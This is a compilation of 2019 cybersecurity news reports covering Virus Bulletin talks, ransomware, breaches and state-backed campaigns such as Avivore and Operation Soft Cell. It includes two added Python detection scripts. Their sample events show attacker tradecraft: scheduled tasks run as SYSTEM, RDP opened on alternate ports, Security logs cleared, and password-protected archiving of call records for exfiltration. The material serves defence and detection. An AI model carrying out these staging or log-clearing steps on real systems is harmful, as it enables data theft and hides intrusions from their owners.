Cyber Risk News
Morals and ethics should be considered when it comes to making decisions in cybersecurity.
Speaking at the Virus Bulletin 2019 conference in London, Ivan Kwiatkowski, security researcher at Kaspersky Lab, said that there are not a lot of discussions on ethics in cybersecurity, as the concept of white hat versus black hat is “the wrong way to think about things” as even the subject of ethical hacking rarely covers the issue of ethics.
Saying he was talking to people “who were thinking of doing something terrible but had not stopped to think about it yet,” he said that this is a young industry which has not yet developed a moral compass; this is not a matter of maturity or diversity, but of people relying on personal intuition for the decisions they face.
“Nobody wants someone to tell them right from wrong,” he added, but he urged people to realize that “knowledge is power and if you control what people know about something, you can convince people.
“Infosec is about controlling what access people have to certain information.” He said that there are ethical dilemmas that people may face, such as:
- A legitimate hacking problem – intelligence agencies and militaries attack organizations, and some nations set up a “surveillance apparatus which can be invaluable in preventing terrorism,” whilst others rely on “hacking back,” and some people who call themselves hacktivists feel justified in hacking something or someone
- Vulnerability handling – when we find a vulnerability, Kwiatkowski said, we still need to reach an agreement on how to handle it. Some companies specialize in selling hacking tools and exploits, and swear that they only do business with governments with a good track record of democracy and human rights. However, he argued: “In some cases, there have been suspect decisions in that regard.”
In the case of exploits being sold on the offensive market, he asked if it is a legal or moral issue, as moral decisions change over time. “All cultures may disagree on what morals are, we all have a moral code and maybe those questions are unsolvable and unescapable.”
He went on to say that we “owe it to ourselves” to determine what constitutes ethical behavior and what does not. Concluding, he recommended “allocating more attention to ethics” and said that it was time we adopted a global code of conduct too, and cited the EFF as being able to push that standard.
He also called on conference organizers to consider this, and to concentrate less on celebrities “especially those celebrities whose success may be traced back to suspicious behavior” and instead, he recommended conference organizers to invite philosophers and “victims of cyber-abuse to tell their stories” to let us know our shortcomings.
Speaking at the Virus Bulletin 2019 conference in London, members of the Cyber Threat Alliance discussed the benefits of sharing intelligence.
Led by moderator and Cyber Threat Alliance COO Heather King, panelists Kathi Whitbey, program manager of cyber threat intelligence information sharing at Palo Alto Networks, and Jeannette Jarvis, director of product marketing at Fortinet, said that there are clear benefits to sharing data, as Jarvis explained: “There is the opportunity to expand and share more deeper intelligence.”
Jarvis said that there is an intention with the Alliance to “build equal or better ecosystems beyond what our adversaries are doing, and to know what they are sharing” and this can better protect customers with “actionable intelligence.”
Whitbey added that the founding members believed in the “power of collaboration and sharing.” Asked by King how the Cyber Threat Alliance is unique, Jarvis admitted that all of the members have different missions, but the collaborative nature means that companies can get enough data to get the complete picture of an issue.
Pointing at the WannaCry incident in 2017, Whitbey said that within hours they knew what each other was seeing and what the issue was, and “we were able to paint a picture as everyone provided what they had and we could see all the information in real time.”
Jarvis admitted that “no one has all the information” and by sharing they get the complete picture and fill in the gaps.
The panelists explained that the members do not all have the same technology or customers, or operate in the same regions, “but if we collaborate we all get into the environment,” Whitbey said.
Jarvis reflected on a previous role at an aerospace company, saying that it was clear from working in that role “that we need to be more connected to help customers.”
Despite the main infections taking place two and half years ago, a large number of computers remain vulnerable to the WannaCry ransomware.
Speaking to Infosecurity at the Virus Bulletin 2019 conference in London, Sophos security researcher Chet Wisniewski said that there are large numbers of businesses who did not apply the patches, released in March and after the infection in May 2017, so machines still remain vulnerable. “That’s what surprised me, with the amount of hype and the amount of news around that vulnerability, it shows that even standing on the rooftop and lighting your hair on fire is not going to be enough for people to take action,” he said.
“The good news is that there is an accidental vaccination which means that the good people won’t get infected with it,” he said. He explained that a version of WannaCry drops a payload, but that payload is currently corrupted; if another infection is attempted on a machine where that file is present, the infection will not take place.
“Fortunately, all of these copies of WannaCry we’re seeing are neutered,” he added. “It’s not hurting anyone, it’s just spreading around and making a lot of noise.”
Wisniewski went on to say that people are still not realizing that “these weaponized exploits are really dangerous, and BlueKeep has been an interesting trial of this.” He said that wormable exploits are typically published within hours, but in the case of BlueKeep the exploit has so far only been added to Metasploit, and companies are using it as a penetration testing tool.
“If people have not patched since 2017, if a BlueKeep publicly exploitable worm was released, instantly millions of machines would be impacted again, and we would be in the same boat as when WannaCry was spreading around,” he said. “Every single one of those machines would be vulnerable as they have not been patched in two years, not to mention all of those that have been patched since.”
Cyber-attacks on UK businesses surged by a whopping 243% over the summer, compared to the same period last year, according to new findings from Beaming.
The Hastings-based business ISP analyzed data from the thousands of organizations across the UK that it supplies.
It found that UK firms experienced 157,528 attacks each on average between July and September, up from 45,970 during the same three months of 2018.
The firm detected nearly 500,000 unique IP addresses used to launch cyber-attacks on UK businesses during the period, with the number originating from China more than doubling over last year. A large number of attacks also originated in Taiwan, Brazil and Russia, Beaming said.
The most frequently targeted systems were Internet of Things (IoT) devices and file sharing services, accounting for 20% and 6% of attacks respectively.
FireEye warned in June of a “dramatic” increase in abuse of file sharing services such as WeTransfer, Dropbox, Google Drive and OneDrive, which are used to host malicious and phishing files in email-borne attacks.
What’s more, cyber-criminals are increasingly gearing up to exploit unprotected IoT devices, according to a Trend Micro report released last month. The firm analyzed chatter on dark web forums across the globe and found routers and IP cameras were the most commonly discussed devices.
Businesses face a threat on two fronts: they could be DDoS-ed or attacked in other ways from botnets of compromised IoT machines like these; or their own operational technology could be hijacked and sabotaged, disrupting key business and manufacturing processes.
“Previous summers have been relatively quiet when it comes to cybercrime, but the hackers haven’t yet taken a break this year. Throughout 2019 we have witnessed new highs in the volume of cyber-attacks hitting organisations in the UK and also the number of active agents behind those attempts,” said Beaming managing director, Sonia Blizzard.
“We are tackling more and more malicious code at a network level to minimize the threat of online attacks to our customers. The hackers are after the weakest link they can find, so companies need to boost their resilience to these sustained, indiscriminate attacks. They can do this by ensuring their software and cybersecurity defenses are up-to-date, putting in place measures such as managed firewalls and educating employees to help them avoid the main risks they could be exposed to.”
The UK’s local authorities are facing an unprecedented barrage of cyber-threats, amounting to almost 800 every hour in the first half of 2019, according to insurance broker Gallagher.
Of the 203 councils that responded to the firm’s Freedom of Information (FOI) requests, nearly half (49%) had been targeted since the start of 2017, with over a third (37%) attacked in the first half of the year.
Over the first six months of 2019, those councils experienced 263 million attacks — a number that is likely to be much higher if those authorities which chose not to answer the FOI request were factored in.
However, despite the barrage, most authorities seem to be holding up: just 17 attacks were reported to have resulted in the loss of data or money, although one council reported the loss of over £2m, according to Gallagher.
Just 13% of local authorities have cyber insurance, a figure the firm would obviously like to see much higher.
“Councils are facing an unprecedented number of cyber-attacks on a daily basis. While the majority of these are fended off, it only takes one to get through to cause a significant financial deficit, a cost which the taxpayer will ultimately foot,” argued Tim Devine, managing director of Public Sector & Education at Gallagher.
“Costs and reputational damage at this scale can be devastating for public authorities, many of which are already facing stretched budgets. In many scenarios, the people responsible for purchasing cyber-insurance products need decisions to be made at member, or management level. The cyber threat and the need for cover needs to be high on every local authority’s agenda.”
However, most of the attacks noted in the report are likely to be the result of “automated probing and discovery tools” and therefore should not be classed as true security incidents, according to Tripwire senior director, Paul Edon.
“However, the truth of the matter is that many local authorities and councils still remain unprepared for a true cyber-attack,” he added.
“To get security right, organizations need to get the basics right. Start by understanding the risk you have. You must conduct regular, preferably continuous, assessments of configuration and vulnerability risk across your IT systems. Then ensure systems are regularly patched and upgraded. Following these basic security hygiene rules will go a long way to making your systems secure and the attackers’ job more difficult.”
Security and privacy experts have heavily criticized an attempt by the UK, US and Australian governments to strong-arm Facebook into halting its roll-out of end-to-end encryption.
Mark Zuckerberg announced a major overhaul of the social network in July following its $5bn fine from the FTC — a move which will include creating a privacy-by-design culture in the firm and extending end-to-end encryption beyond WhatsApp to Instagram and Messenger.
However, western governments are predictably dismayed at any efforts which will confound attempts by their intelligence agencies and the police to track suspects.
A widely reported open letter to Facebook from three-fifths of the Five Eyes nations demanded that the firm not continue with the encryption roll-out “without ensuring that there is no reduction to user safety and without including a means for lawful access to the content of communications to protect our citizens.”
That effectively means backdoor access for governments and law enforcers, something that the world’s leading cryptographers have repeatedly stated is not possible without undermining security for all.
Hannah Quay-de la Vallee, senior technologist at the non-profit Center for Democracy and Technology (CDT), repeated these arguments.
“Strong encryption and end-to-end security are bedrock technologies that keep information safe online. These technologies protect billions of communications every day, from the sensitive correspondence of victims of domestic violence to businesses’ financial records to our private medical information,” she explained.
“Creating a law that would mandate weaker and less secure technology is like mandating crumbling sidewalks to prevent criminals from escaping. It’s ridiculous, it won’t work, and it puts us all at far greater risk of serious injury.”
NSA whistleblower Edward Snowden also chipped in, warning that if Facebook caves to these government demands, “it may be the largest overnight violation of privacy in history.”
That doesn’t seem likely though, with a Facebook statement issued to confirm: “We strongly oppose government attempts to build backdoors because they would undermine the privacy and security of people everywhere.”
The open letter comes as the US and UK trumpeted a new “world first” data sharing agreement that will allow law enforcers on both sides of the Atlantic to demand data from tech firms in the other country without needing to go through a lengthy liaison process with their respective governments.
The US Food and Drug Administration (FDA) issued a warning on Tuesday over vulnerabilities detected in decades-old software being used by many medical devices and hospital networks.
The 11 vulnerabilities exist in IPnet, a third-party software component that supports network communications between computers. If exploited, the vulnerabilities could allow hackers to remotely control a medical device, change its function, obstruct service, or trigger information leaks that could stop it from working.
Makers of the original IPnet software, Interpeak, no longer support it, but some manufacturers have a license to use it without support, meaning it could be incorporated into other software applications, equipment, and systems still in use in medical devices.
When the vulnerabilities were discovered, it was thought that they only affected some versions of the popular real-time operating system Wind River VxWorks. However, the true impact of the cybersecurity risk is much greater because the IPnet software was licensed and used in multiple operating systems employed by the healthcare industry.
According to the FDA, some versions of operating systems Integrity by Green Hills, ThreadX by Microsoft, Operating System Embedded by ENEA, ITRON by TRON Forum, and ZebOS by IP Infusion may contain the vulnerable software component.
Medical devices affected so far include an imaging system, an infusion pump, and an anesthesia machine. The FDA said in its warning that it "expects that additional medical devices will be identified that contain one or more of the vulnerabilities associated with the original IPnet software."
IPnet's vulnerabilities are zero-day, meaning that they have existed since the software's creation.
The Cybersecurity and Infrastructure Security Agency issued a warning regarding cybersecurity vulnerabilities in Wind River VxWorks on July 30.
The document, which was put together by the FDA and Health Canada, says regarding third-party components: "These components can create risk of their own, which is managed by the manufacturer through risk management, quality management, and design choice. Manufacturers should manage the cybersecurity implications of the components—software and hardware—that are part of their devices.
"Similarly, post-market issues with a third-party component may also affect the security of the medical device, and manufacturers need to manage this risk. Users expect the manufacturer to understand how a security vulnerability in an underlying component such as an operating system or processor affects the medical device. Regulators will require it."
Ransomware gangs, intent on stealing American dollars, have struck at least 621 targets in the US government, education, and healthcare sectors since January.
A report into stateside ransomware attacks, released on October 1 by antivirus company Emsisoft, which is an associate partner in Europol’s No More Ransom Project, paints a picture of a nation in a serious cyber-predicament.
At least 68 state, county, and municipal entities have been impacted by this particular type of attack since the beginning of the year. In just one attack on Baltimore, MD, carried out in May using the ransomware RobbinHood, recovery costs are estimated to have been $18.2 million.
A Ryuk attack on Lake City, FL, in June led to insurers forking over a $460,000 ransom minus a $10,000 deductible, and only part of the data affected was recovered.
So far this year, there have been at least 62 ransomware incidents involving school districts and other educational establishments, which potentially impacted operations at up to 1,051 individual schools, colleges, and universities.
The healthcare sector has suffered just under 500 attacks since this year's ball drop in Times Square heralded the start of 2019.
Fabian Wosar, Emsisoft CTO, told Infosecurity Magazine: "When we look at absolute numbers in all areas—business, government, and home users—ransomware is on the decline. However, this is mostly due to the fact that ransomware gangs focus on business and government targets these days instead of the large-scale spray-and-pray attacks against home users that were dominant just a few years ago. So, while the pressure on home users went down dramatically, it skyrocketed for those other areas."
Describing the biggest ransomware payout he had come across, Wosar said: "The biggest confirmed payout I have seen was $700,000, but I cannot disclose specific details about that case."
How an organization decides to deal with a ransomware attack has a major bearing on whether it will be re-targeted at a later date.
Wosar told Infosecurity Magazine: "What definitely will make you a big target is if you got ransomed and paid. During a lot of these attacks we have seen ransomware groups leave behind backdoors that allow them to access the systems again in the future. Given this backdoor access and your willingness to pay for your data, you become a prime target for a second attack later down the line."
Sharing his predictions on how ransomware attacks will evolve, Wosar said: "I believe that attacks on organizations with outsourced infrastructure and IT will become increasingly common. The tools used by MSPs and other service providers act as a gateway to their clients’ systems and, as we saw in the Texas and PercSoft incidents, enable multiple organizations to be ransomed in one fell swoop."
The co-founder and former CTO of cryptocurrency mining marketplace NiceHash has been arrested by German federal police in connection with US charges of racketeering and fraud.
According to the news website 24ur.com, Matjaz Škorjanc was arrested on Monday in Schwarzbach after crossing the German border in a car with Slovenian license plates.
Slovenian national Škorjanc is wanted in the US on suspicion of being a member of a criminal organization that committed a number of cyber-frauds between 2008 and 2013.
The US alleges that the 33-year-old set up and managed online password-protected hacking forum Darkode, in which cyber-criminals convened to buy, sell, trade, and share information, ideas, and tools to facilitate unlawful intrusions into others’ computers and electronic devices.
Darkode was shut down in 2015 as part of an internationally coordinated law enforcement effort called Operation Shrouded Horizon.
Škorjanc, who was known online as "iserdo" and "serdo," is further accused of creating and deploying the malicious botnet Mariposa, which harvested personal data from nearly a million computers around the world. Mariposa caused estimated damages of around $4 million after using cyber-scamming and denial-of-service (DoS) attacks to effectively turn infected computers into remotely controlled zombies.
An indictment was filed in the US District Court for the District of Columbia on December 4, 2018, against Škorjanc, fellow Slovene Mentor Leniqi, Spaniard Florence Carro Ruiz, and American Thomas McCormick. Each of the accused was charged with racketeering conspiracy and conspiracy to commit wire fraud and bank fraud. The racketeering conspiracy charge includes conspiracy to commit bank, wire, and access device fraud, identity theft, hacking, and extortion.
McCormick—the last known administrator of the Darkode forum—was also charged with five counts of aggravated identity theft. He was arrested at the FBI’s Washington Field Office in Washington, DC, six days after the indictment was filed.
If convicted of the charges, each of the accused could spend up to 50 years behind bars.
Škorjanc has already served four years and ten months in a Slovenian prison after being convicted for his role in the Mariposa botnet.
Škorjanc's father and H-Bit CEO Martin Škorjanc said: "There is no real legal basis for the prosecution, as Matjaz Škorjanc was already convicted for the same act as prosecuted by the US prosecutor, and the sentence has already been fully passed in Slovenia.
"It is an inadmissible retrial of the same thing; it is forbidden by Slovenian, European, and American law."
The annual Security Serious “Unsung Heroes” awards were announced at an event in central London last night.
The fourth annual awards are intended to celebrate the people of the cybersecurity industry, recognizing the individuals and teams working hard to protect Britain from cybercrime and raise awareness of security issues.
“It can often be a thankless task working in cybersecurity; and as an industry, we tend to focus on technology and innovation,” said lead organizer of Security Serious Week, Yvonne Eskenzi.
“The cyber skills gap is a huge issue for this country and an event like this really shows off what a great industry it is to be a part of and the wonderful people that make it.”
The full list of winners was:
- Winner: Joe Hancock – MDR Cyber
- Highly Acclaimed: James Packer – (ISC)2
- Winner: Dan Raywood – Infosecurity Magazine
- Highly Acclaimed: Kate O'Flaherty – Tech Journalist
Best Security Awareness Campaign
- Winner: Host Unknown
- Highly Acclaimed: City of London Police
- Winner: Hamish McGowan – Channel 4
- Highly Acclaimed: Sophia McCall – Bournemouth University
- Winner: Jonathan Armstrong – Cordery Compliance
- Highly Acclaimed: David Hyett – UKRI
- Winner: Bayside School Cyber Club supported by GVC Group
- Highly Acclaimed: Toni Scullion and the Turing’s Testers
Best Ethical Hacker / Pentester
- Winner: Rob Hillier – XQ Cyber
- Winner: Quentyn Taylor – Canon Europe
- Highly Acclaimed: Shan Lee – Transferwise
Godparent of Security
- Winner: Paul Simmonds – Global Identity Foundation
- Highly Acclaimed: Adrian Davis – Consulting COO & CIO
Security researchers have identified a new state-backed threat group they believe to be behind the recently disclosed attacks on European aerospace supply chain companies and organizations in other verticals.
Reports had suggested the attacks — which affected UK engine-maker Rolls Royce, French tech supplier Expleo and two other French Airbus suppliers — had been carried out either by China’s APT10 group or a regional branch of the country’s Ministry of State Security, known as JSSD.
However, security researchers at Context believe the attacks are the work of another nation state hacking group. Although the firm stops short of blaming China, it notes that the “Avivore” group does operate in the same time zone and shares some similarities with APT10/JSSD.
The group’s attack methodology follows a set pattern. After using compromised user credentials and legitimate remote access tools to infiltrate targeted networks, hackers escalate privileges by abusing legitimate tools and/or highly privileged accounts.
Next, they conduct account and host enumeration using “net” commands, schedule execution of scripts and tooling run in the context of the “SYSTEM” user, and remove any traces of scripts, tooling and event logs following execution. RDP is also used for lateral movement.
While many supply chain attacks are “vertical” in nature, involving an initial compromise of MSPs or software vendors, the Avivore campaigns are more “horizontal” — relying on island hopping techniques.
The group abused the commercial VPNs and other collaborative solutions used by large multinationals and the smaller engineering or consultancy firms in their supply chain. Other legitimate tools leveraged by Avivore include network scanning and certificate extraction tools, and Windows Sysinternals tools such as ProcDump.
Binaries were disguised as Windows DLLs, with tools executed remotely using scheduled tasks and then removed, according to Context.
“Avivore showed themselves to be highly capable; adept at both 'living-off-the-land' and in their operational security awareness; including forensically covering their tracks. They demonstrated detailed knowledge of key individuals associated with projects of interest, and were able to successfully mirror working times and patterns of these users to avoid arousing suspicions,” explained the report.
“They were also able to manipulate victim environments and security controls to facilitate and obfuscate their activities: e.g. modifying firewall rules to accept RDP over alternate ports; establishing hosts within the victim environment as remote access proxies.”
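The tradecraft described above is almost entirely built from legitimate Windows facilities, so detection has to look for the sequence rather than for a malicious binary. The following is an added example, not Context's code or detection content: it runs simple rules over constructed Windows Security event records (event IDs 4624 with logon type 10 for RDP logons, 4698 for scheduled task creation, 4946/4947 for firewall rule changes, and 1102 for a cleared security log) and then correlates per host, flagging any machine on which several of these techniques appear together. The record format, host names and rule names are assumptions made for the example.

```python
"""Correlate living-off-the-land indicators across Windows Security events.

Added example (not from the original report). Event records are constructed
dicts modelled on Windows Security event fields; real collection would come
from a SIEM or Windows Event Forwarding, not from this inline string.
"""
from __future__ import annotations

from dataclasses import dataclass
import json

SYSTEM_SID = "S-1-5-18"     # the local SYSTEM account
RDP_PORT = "3389"           # default RDP listener; alternate ports are suspicious
RDP_KEYWORDS = ("rdp", "remote desktop", "terminal services")

# Constructed sample events (one JSON object per line); not from any real incident.
SAMPLE_EVENTS = r"""
{"EventID": 4624, "Computer": "ENG-WS-07", "SubjectUser": "-", "TargetUser": "jdoe", "LogonType": 10, "IpAddress": "10.20.0.45"}
{"EventID": 4698, "Computer": "ENG-WS-07", "SubjectUser": "jdoe", "TaskName": "\\Microsoft\\Windows\\Maint\\Cleanup", "TaskPrincipal": "S-1-5-18"}
{"EventID": 4946, "Computer": "ENG-WS-07", "SubjectUser": "jdoe", "RuleName": "Remote Desktop Alt", "Protocol": "TCP", "LocalPort": "3390", "Direction": "Inbound"}
{"EventID": 1102, "Computer": "ENG-WS-07", "SubjectUser": "jdoe"}
{"EventID": 4698, "Computer": "FILE-01", "SubjectUser": "svc_backup", "TaskName": "\\Backup\\Nightly", "TaskPrincipal": "DOMAIN\\svc_backup"}
"""


@dataclass(frozen=True)
class Finding:
    computer: str
    technique: str
    detail: str


def parse_events(text: str) -> list[dict]:
    """Parse newline-delimited JSON event records, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def is_rdp_alt_port_rule(ev: dict) -> bool:
    """Inbound TCP rule that names RDP but listens on a port other than 3389."""
    name = str(ev.get("RuleName", "")).lower()
    looks_like_rdp = any(k in name for k in RDP_KEYWORDS)
    return (
        looks_like_rdp
        and ev.get("Direction") == "Inbound"
        and ev.get("Protocol") == "TCP"
        and str(ev.get("LocalPort")) != RDP_PORT
    )


def detect(events: list[dict]) -> list[Finding]:
    """Apply one rule per technique named in the report and collect findings."""
    findings: list[Finding] = []
    for ev in events:
        eid = ev.get("EventID")
        host = ev.get("Computer", "?")
        actor = ev.get("SubjectUser", "?")
        if eid == 4624 and ev.get("LogonType") == 10:
            # Logon type 10 is RemoteInteractive, i.e. an RDP session
            findings.append(Finding(host, "rdp_logon",
                                    f"{ev.get('TargetUser')} from {ev.get('IpAddress')}"))
        elif eid == 4698 and ev.get("TaskPrincipal") == SYSTEM_SID:
            # Scheduled task registered to run in the SYSTEM context
            findings.append(Finding(host, "scheduled_task_as_system",
                                    f"{ev.get('TaskName')} registered by {actor}"))
        elif eid in (4946, 4947) and is_rdp_alt_port_rule(ev):
            # Firewall rule admitting RDP on an alternate port
            findings.append(Finding(host, "firewall_rdp_alt_port",
                                    f"{ev.get('RuleName')} on port {ev.get('LocalPort')}"))
        elif eid == 1102:
            # The Security log itself was cleared
            findings.append(Finding(host, "security_log_cleared", f"cleared by {actor}"))
    return findings


def hosts_matching_pattern(findings: list[Finding], min_techniques: int = 3) -> dict[str, set[str]]:
    """Hosts on which at least `min_techniques` distinct techniques were seen."""
    by_host: dict[str, set[str]] = {}
    for f in findings:
        by_host.setdefault(f.computer, set()).add(f.technique)
    return {h: t for h, t in by_host.items() if len(t) >= min_techniques}


if __name__ == "__main__":
    found = detect(parse_events(SAMPLE_EVENTS))
    for f in found:
        print(f"{f.computer}: {f.technique}: {f.detail}")
    for host, techniques in hosts_matching_pattern(found).items():
        print(f"ALERT {host}: {len(techniques)} techniques: {sorted(techniques)}")
```

The per-host correlation is the part that matters: any one of these events is routine on its own (administrators create SYSTEM tasks and open RDP ports), but a scheduled SYSTEM task, a new RDP rule on an alternate port and a cleared Security log on the same workstation within one session is the pattern the report describes. In the sample, ENG-WS-07 trips all four rules while FILE-01's backup task, which runs as a domain service account rather than SYSTEM, does not.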
Although most Avivore activity has taken place since early 2018, the researchers claimed that the PlugX remote access Trojan may have been deployed on victim networks as early as October 2015.
Other verticals thought to have been targeted include automotive, consulting, energy/nuclear and satellite/space technology.
Customer support software giant Zendesk has discovered a security breach dating back to 2016, affecting thousands of corporate clients.
After being alerted to the incident by a third party, the firm last week identified 10,000 Zendesk Support and Chat accounts which had been accessed by an unauthorized third party.
Although this number contained some trial accounts and others that are no longer active, Zendesk has a number of high-profile clients including Airbnb, Uber and OpenTable that could be affected.
There’s apparently no evidence that ticket data was accessed. However, email addresses, names and phone numbers of agents and end users of certain Zendesk products up to November 2016 were accessed, as well as hashed and salted agent and end user passwords. In this context, “agents” are the customer support staff from client organizations who use the software, while “end users” are their customers.
The firm said there’s no evidence these passwords were used to access Zendesk services.
In addition, for around 700 accounts, the TLS encryption keys and the configuration settings of apps installed from the Zendesk app marketplace or private apps were accessed.
“As a precautionary measure, in the next 24 hours, we are starting to implement password rotations for all active agents in Support and Chat, and all end users in Support created prior to November 1, 2016,” Zendesk explained.
“This password rotation will impact all other products which share authentication with Support, including Guide, Talk and Explore. Upon their next login, each of these users will be required to create a new password. You will not be impacted by this if we have been able to identify that you have updated your password since November 1, 2016 or have implemented Single Sign-On in connection with your account.”
The firm urged customers with accounts dating back prior to November 1, 2016 to rotate all credentials for any Zendesk Marketplace or private apps; to upload new TLS certificates and revoke the old ones; and to rotate any authentication credentials used in Zendesk products before the November date.
Over 20 million Russian tax records were found publicly exposed in a misconfigured Elasticsearch database last month, in yet another privacy snafu.
Security researcher Bob Diachenko teamed up again with Comparitech to discover the unsecured server, which contained personally identifiable information (PII) on Russian citizens dating from 2009-2016.
Lacking password protection or any other authentication mechanism, the Amazon Web Services Elasticsearch cluster was first indexed by search engines in May 2018. Diachenko discovered it on September 17 and notified the Ukraine-based owner.
Although the researchers are still unclear what entity managed the database, it was made inaccessible three days after Diachenko raised the red flag.
The unencrypted PII included names, addresses, residency status, passport and phone numbers, tax ID numbers, and employer names and phone numbers. It sat exposed for over a year.
“The cluster contained multiple databases. Some seemed to contain mostly random and publicly sourced data. Two databases, however, included tax and personally identifiable information about Russian citizens. Most of those citizens appear to be from Moscow and the surrounding area,” explained Comparitech’s Paul Bischoff.
“The first database contained more than 14 million personal and tax records from 2010 to 2016, and the second included over six million from 2009 to 2015.”
The data is highly sensitive and could be used to craft convincing follow-on phishing and identity fraud schemes.
Organizations across the globe are failing to protect their Elasticsearch databases. This year alone, researchers have used simple online search tools to find: 8TB of email metadata belonging to a leading Chinese university, 24 million financial records from multiple banks, a copy of the Dow Jones Watchlist containing 2.4 million records and PII on 82 million Americans exposed by a mystery company.
AWS S3 buckets and MongoDB instances are also commonly misconfigured, exposing countless organizations and their customers to the threat of data theft.
Speaking at the Virus Bulletin 2019 conference in London, Cybereason researchers Amit Serper, Mor Levi and Assaf Dahan discussed the “worldwide campaign against telecommunication providers” that they coined Operation Soft Cell.
Described by Serper as an access operation which was a “multi-wave attack,” he said that the operation targeted call detail records (CDRs) which contain details of call information, where calls are made and the originating number and IMEI number.
“With this you can build a complete picture of a person and where they are located through the day,” he said. “You get a lot of information without getting on the phone as metadata is siphoned off.”
Levi said an investigation usually starts with small pieces being tied together, from which the researchers were able to learn more about the attacker. Levi said that the investigation started in 2018, and nothing was unusual at first, but second, third and fourth waves of attack were spotted, which led them to conclude that this was the same actor “as behavior and techniques were almost the same, and they were adaptive and changing indicators to bypass detection.” It was later revealed by the researchers that the compromise had sometimes gone on for up to seven years.
During the third phase, the researchers realized the attacker was not after bill data or domain administrator details.
Dahan said that the attacker was able to get in, do external reconnaissance, and use third party tools for exfiltration and to move laterally and obtain credentials.
“We understood that the attack was on exfiltration, as they compressed and password protected it,” Dahan said. Serper pointed out that remote access Trojans like Poison Ivy were used.
Levi added that it was “hard to connect the dots but we knew the bigger picture,” and that the purpose of the threat intelligence research was to get that big picture. The affected companies were informed, and the investigation expanded from Cybereason’s initial customer to dozens of other telcos.
The research also revealed that a lot of the activity took place during working hours in GMT+8, the time zone that covers China, complete with a two-hour lunch break. Serper concluded by saying that when he told those affected, he got very negative responses, as “cyber insurance doesn’t cover nation state attacks as it is an act of war.”
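Dahan’s observation that the exfiltration was recognizable because the data was compressed and password protected translates directly into a host-based detection. The following is an added example, not Cybereason’s code or data: it runs a rule over constructed Sysmon-style process-creation events, flags archivers invoked with a password switch (rar -hp/-p, 7-Zip -p), records whether the binary ran from an expected install path, and converts the hit timestamps into a chosen UTC offset for the working-hours profiling the researchers described. The event format, host names, user names and paths are all assumptions.

```python
import re
from collections import Counter
from datetime import datetime, timedelta, timezone

# Constructed Sysmon-style process-creation events (hypothetical hosts, users
# and paths; not data from the Cybereason investigation). Timestamps are UTC.
EVENTS = [
    r'2019-02-11T01:07:42Z host=CDR-DB02 user=CORP\svc_etl image=C:\Oracle\bin\sqlldr.exe cmdline="sqlldr.exe control=daily.ctl"',
    r'2019-02-11T02:13:55Z host=CDR-DB02 user=CORP\svc_backup image=C:\ProgramData\rar.exe cmdline="rar.exe a -hpQw3rty! -m5 -v500m C:\ProgramData\tmp\c.rar D:\cdr\2019\01\*.csv"',
    r'2019-02-11T02:41:09Z host=WS-1187 user=CORP\jsmith image=C:\Program Files\7-Zip\7z.exe cmdline="7z.exe a photos.7z C:\Users\jsmith\Pictures"',
    r'2019-02-12T03:02:30Z host=BILLING01 user=CORP\svc_backup image=C:\Windows\Temp\7z.exe cmdline="7z.exe a -pS3cret -mhe=on C:\Windows\Temp\out.7z D:\cdr\2019\02"',
]

EVENT_RE = re.compile(
    r'^(?P<ts>\S+) host=(?P<host>\S+) user=(?P<user>\S+) '
    r'image=(?P<image>.+?) cmdline="(?P<cmd>.*)"$')
ARCHIVERS = {"rar.exe", "winrar.exe", "7z.exe", "7za.exe"}
# rar: -p<pwd> or -hp<pwd> (encrypts headers too); 7-Zip: -p<pwd>.
PASSWORD_SWITCH = re.compile(r"(?:^|\s)-(?:hp|p)\S*")
ARCHIVE_PATH = re.compile(r"\S+\.(?:rar|7z|zip)\b", re.I)
EXPECTED_DIRS = ("c:\\program files\\", "c:\\program files (x86)\\")


def find_password_protected_archiving(events):
    """Return one finding per event in which an archiver was run with a
    password switch: the staging step Dahan describes, seen from the host."""
    findings = []
    for line in events:
        m = EVENT_RE.match(line)
        if not m:
            continue
        image = m["image"]
        if image.rsplit("\\", 1)[-1].lower() not in ARCHIVERS:
            continue
        if not PASSWORD_SWITCH.search(m["cmd"]):
            continue
        archive = ARCHIVE_PATH.search(m["cmd"])
        findings.append({
            "ts": m["ts"], "host": m["host"], "user": m["user"],
            "archive": archive.group(0) if archive else None,
            # A copy of rar.exe or 7z.exe dropped outside Program Files is a
            # second signal worth surfacing alongside the password switch.
            "from_expected_path": image.lower().startswith(EXPECTED_DIRS),
        })
    return findings


def local_hour(ts_utc, utc_offset_hours):
    """Hour of day in the operator's assumed time zone, for the kind of
    working-hours profiling the researchers described (GMT+8 for China)."""
    when = datetime.strptime(ts_utc, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    return (when + timedelta(hours=utc_offset_hours)).hour


def activity_profile(findings, utc_offset_hours):
    """Count findings per local hour in the assumed operator time zone."""
    return Counter(local_hour(f["ts"], utc_offset_hours) for f in findings)


if __name__ == "__main__":
    hits = find_password_protected_archiving(EVENTS)
    for hit in hits:
        print(hit)
    print("hits by hour (UTC+8):", dict(activity_profile(hits, 8)))
```

On a database or billing server, legitimate backup jobs rarely encrypt with a command-line password, so the rule is low-noise there; on workstations expect to allow-list a few users. The time-of-day profile only becomes meaningful across many events and several days, and it is a hint for the analyst, not attribution on its own.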
Threat actors have been using cyber-disguises to keep their true intentions secret, according to a report published today by Optiv Security.
Typical cyber threat intelligence usually categorizes threat actors in fixed classes, such as nation-states, cyber-criminals, commercial entities, and hacktivists. But, according to Optiv’s new 2019 Cyber Threat Intelligence Estimate (CTIE) report, "it’s a mistake to assume these categories are rigid or to assume that a threat actor’s classification is static."
The CTIE report is inspired by national intelligence estimates, which are analytic reports produced by the intelligence community of the United States for consumption by Congress. The CTIE comprises contributions from Optiv’s Global Threat Intelligence Center (gTIC), cyber threat intelligence company IntSights, and Carbon Black, a leader in cloud endpoint protection.
Optiv researchers found that it's not unusual for threat actors to have multiple criminal identities that they can switch between to get what they want without revealing who they are or what their actual agenda is.
For example, nation-state actors may pretend to be just a regular cyber-criminal targeting a company’s customer database, when in reality their target is to delve into the firm's deepest recesses to steal its intellectual property.
According to the report: "Sometimes threat actors may masquerade as a certain type in order to hide their true agenda. Or, threat actors may belong to two or more classes, switching between them as their priorities change."
Threat actors who demonstrate this switching behavior to cloak the true nature of their activity are described by Optiv's researchers as "hybrid threat actors." According to the report, their primary targets are governments, manufacturing, energy, and utilities.
